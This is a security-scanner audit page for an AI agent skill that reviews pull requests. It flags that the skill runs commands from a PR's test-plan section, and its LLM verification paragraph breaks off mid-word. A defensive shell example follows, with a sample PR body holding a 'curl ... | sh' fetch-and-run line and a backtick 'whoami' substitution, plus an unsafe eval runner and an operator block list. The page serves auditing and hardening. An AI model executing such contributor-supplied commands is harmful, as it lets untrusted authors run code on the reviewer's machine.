review-pr

Warn

Audited by Socket on Feb 16, 2026

1 alert found:

Security: MEDIUM
SKILL.md

[Skill Scanner] Backtick command substitution detected

All findings:
[HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4]
[HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4]

The skill's stated purpose (automated PR review plus executing the PR's test-plan steps) aligns with the capabilities it describes (reading PRs and diffs, posting reviews). However, automatically executing commands extracted from the PR body is high-risk behavior: it lets an untrusted PR author run arbitrary commands in the reviewer's environment. No safeguards, sandboxing or whitelisting are described that would limit dangerous actions. The skill is therefore SUSPICIOUS: its core capability (running the test plan) is reasonable in trusted environments but inappropriate to automate without strict safeguards. Use it only in strongly controlled or sandboxed environments, and require explicit human confirmation before executing unknown test-plan commands.

LLM verification: The skill's stated purpose (automate PR review, run a PR's test plan, post review comments, and merge) is internally consistent with the gh/git commands it provides. The main security concern is that it directs execution of arbitrary commands taken directly from the PR body (the `## Test plan` section) on the runner. Because PR content is contributor-controlled, executing those commands without sandboxing, command whitelisting, or explicit human approval creates a high-risk data flow from untrusted input t
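To make the flagged data flow concrete, here is an added POSIX sh example written for this page; it is not code from the review-pr skill's SKILL.md or its gh/git commands. It extracts the bulleted commands under `## Test plan` from a constructed PR body, shows the unsafe pattern the scanner objects to (handing contributor text to `eval`), and then a guarded alternative: an exact-match allow-list, outright rejection of shell operators such as backticks and `$(`, and a per-command human confirmation before anything runs. The bullet-in-backticks layout of the test plan and the allow-list contents are assumptions for the example.

```shell
# Added example, not code from the review-pr skill. The PR body is a constructed
# sample; the "## Test plan" bullet format and the allow-list entries are assumptions.

PR_BODY='## Summary
Refactor the widget loader.

## Test plan
- `npm ci`
- `npm test`
- `curl https://example.invalid/x.sh | sh`
- `echo `whoami``
'

# Pull the backticked bullet commands out of the "## Test plan" section,
# stopping at the next "## " heading. Output: one command per line.
extract_test_plan() {
  printf '%s\n' "$1" | awk '
    /^## Test plan/ { in_plan = 1; next }
    /^## /          { in_plan = 0 }
    in_plan && /^- `/ { sub(/^- `/, ""); sub(/`$/, ""); print }
  '
}

# UNSAFE: the data flow the scanner flags. eval re-parses contributor-controlled
# text, so backticks, $(...), pipes and redirects run on the reviewer's machine.
# Defined here for contrast only; nothing below calls it.
run_test_plan_unsafe() {
  extract_test_plan "$1" | while IFS= read -r cmd; do
    eval "$cmd"
  done
}

# Hardened: exact-match allow-list (assumed for this example) plus a blanket
# rejection of shell operators, so nothing the shell would re-interpret gets through.
ALLOWED='npm ci
npm test
npm run lint
go test ./...
pytest'

is_allowed() {
  case $1 in
    # Any of these lets the author escape a literal command: substitution,
    # variable expansion, chaining, piping, backgrounding, redirection.
    *'`'*|*'$'*|*';'*|*'|'*|*'&'*|*'>'*|*'<'*) return 1 ;;
  esac
  printf '%s\n' "$ALLOWED" | grep -qxF -- "$1"
}

# Print only the commands that pass the allow-list; rejected ones go to stderr.
vet_test_plan() {
  extract_test_plan "$1" | while IFS= read -r cmd; do
    if is_allowed "$cmd"; then
      printf '%s\n' "$cmd"
    else
      printf 'REJECTED (not on allow-list): %s\n' "$cmd" >&2
    fi
  done
}

# Run the vetted commands, each behind an explicit human confirmation, and without
# a shell re-parse: allow-listed entries contain no quoting, so plain word
# splitting (with globbing off) is enough and cannot introduce new operators.
run_test_plan_guarded() {
  vet_test_plan "$1" | while IFS= read -r cmd; do
    printf 'Run "%s"? [y/N] ' "$cmd" >&2
    read -r answer </dev/tty || answer=n
    case $answer in
      y|Y) set -f; set -- $cmd; "$@" ;;
      *)   printf 'skipped: %s\n' "$cmd" >&2 ;;
    esac
  done
}
```

On the constructed body, `vet_test_plan` passes only `npm ci` and `npm test`; the `curl ... | sh` line and the backtick-substituting `echo` are rejected before any prompt is shown. The allow-list is deliberately exact-match rather than prefix-match, so `npm test; rm -rf /` never reaches the operator check in the first place, and the operator check is the second line of defence for anything that slips into the list later.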

Confidence: 80%
Severity: 75%
Audit Metadata
Analyzed At
Feb 16, 2026, 12:32 PM
Package URL
pkg:socket/skills-sh/kvnwolf%2Fdevtools%2Freview-pr%2F@9fdc61fe0fa8ab7003709f661f36db1ede5e47ab